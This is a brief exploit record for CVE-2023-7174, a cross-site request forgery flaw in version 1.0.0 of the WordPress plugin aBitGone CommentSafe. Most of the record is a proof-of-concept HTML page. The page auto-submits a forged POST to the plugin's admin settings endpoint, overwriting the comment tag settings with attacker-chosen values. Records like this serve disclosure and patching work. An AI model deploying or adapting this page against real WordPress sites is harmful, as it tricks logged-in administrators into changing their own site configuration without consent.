CVE: CVE-2023-7174

Name: aBitGone CommentSafe (abitgone-commentsafe)

Version: 1.0.0

Date: 2022-12-11 14:02:20

Advisory: 

Type: CSRF

Exploit: 


<form action="https://example.com/wp-admin/plugins.php?page=abg_commentsafe" method="POST">
    <input type="text" name="abg_commentsafe_tags" value="hacked">
    <input type="text" name="abg_commentsafe_behaviour" value="strip">
    <input type="text" name="submit" value="Update Tags">
</form>
<script>
    HTMLFormElement.prototype.submit.call(
        document.forms[0]
    );
</script>